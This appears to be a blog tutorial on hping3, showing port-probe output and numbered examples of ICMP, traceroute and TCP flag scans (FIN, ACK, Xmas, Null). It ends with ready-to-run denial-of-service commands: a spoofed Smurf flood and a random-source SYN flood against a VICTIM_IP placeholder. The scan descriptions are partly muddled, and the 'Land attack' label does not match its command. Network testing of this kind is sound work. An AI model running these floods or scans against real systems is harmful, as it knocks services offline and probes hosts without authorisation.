information gathering – hping

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

If your good and not running in root you will require sudo. Backtrack drop sudo as your running in root.
sudo hping3 -c 1 -V -I tap0 -p 445 -S 192.168.0.100

sudo hping3 -c 1 -V -I tap0 -p 445 -S 192.168.0.100
using tap0, addr: 192.168.0.1, MTU: 1500
HPING 192.168.0.100 (tap0 192.168.0.100): S set, 40 headers + 0 data bytes
len=46 ip=192.168.0.100 ttl=128 DF id=1315 tos=0 iplen=44
sport=445 flags=SA seq=0 win=64240 rtt=0.6 ms
seq=2232013429 ack=25004686 sum=9f2f urp=0

— 192.168.0.100 hping statistic —
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.6/0.6/0.6 ms

for use with nic card

sudo hping3 -c 1 -V -I eth0 -p 445 -S 192.168.0.100

-c = count
-V = verbose
-I = Network Interface to use
-1 = ICMP packet
-p port to use

Testing firewall rules with Hping3 – examples
Mon, 05 Jul 2010

1. Testing ICMP: In this example hping3 will behave like a normal ping utility, sending ICMP-echo und receiving ICMP-reply
hping3 -1 0daysecurity.com

2. Traceroute using ICMP: This example is similar to famous utilities like tracert (windows) or traceroute (linux) who uses ICMP packets increasing every time in 1 its TTL value.
hping3 –traceroute -V -1 0daysecurity.com

3. Checking port: Here hping3 will send a Syn packet to a specified port (80 in our example). We can control also from which local port will start the scan (5050).
hping3 -V -S -p 80 -s 5050 0daysecurity.com

4. Traceroute to a determined port: A nice feature from Hping3 is that you can do a traceroute to a specified port watching where your packet is blocked. It can just be done by adding –traceroute to the last command.
hping3 –traceroute -V -S -p 80 -s 5050 0daysecurity.com

5. Other types of ICMP: This example sends a ICMP address mask request ( Type 17 ).
hping3 -c 1 -V -1 -C 17 0daysecurity.com

6. Other types of Port Scanning: First type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed..
hping3 -c 1 -V -p 80 -s 5050 -F 0daysecurity.com

7. Ack Scan: This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.
hping3 -c 1 -V -p 80 -s 5050 -A 0daysecurity.com

8. Xmas Scan: This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If the target device’s TCP port is closed, the target device sends a TCP RST packet in reply. If the target device’s TCP port is open, the target discards the TCP Xmas scan, sending no reply.
hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF 0daysecurity.com

9. Null Scan: This scan sets the sequence number to zero and have no flags set in the packet. If the target device’s TCP port is closed, the target device sends a TCP RST packet in reply. If the target device’s TCP port is open, the target discards the TCP NULL scan, sending no reply.
hping3 -c 1 -V -p 80 -s 5050 -Y 0daysecurity.com

10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.
hping3 -1 –flood -a VICTIM_IP BROADCAST_ADDRESS

11. DOS Land Attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 –flood –rand-source VICTIM_IP

* –flood: sent packets as fast as possible. Don’t show replies.
* –rand-dest: random destionation address mode. see the man.
* -V <– Verbose
* -c –count: packet count
* -d –data: data size
* -S –syn: set SYN flag
* -w –win: winsize (default 64)
* -p –destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
* -s –baseport: base source port (default random)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s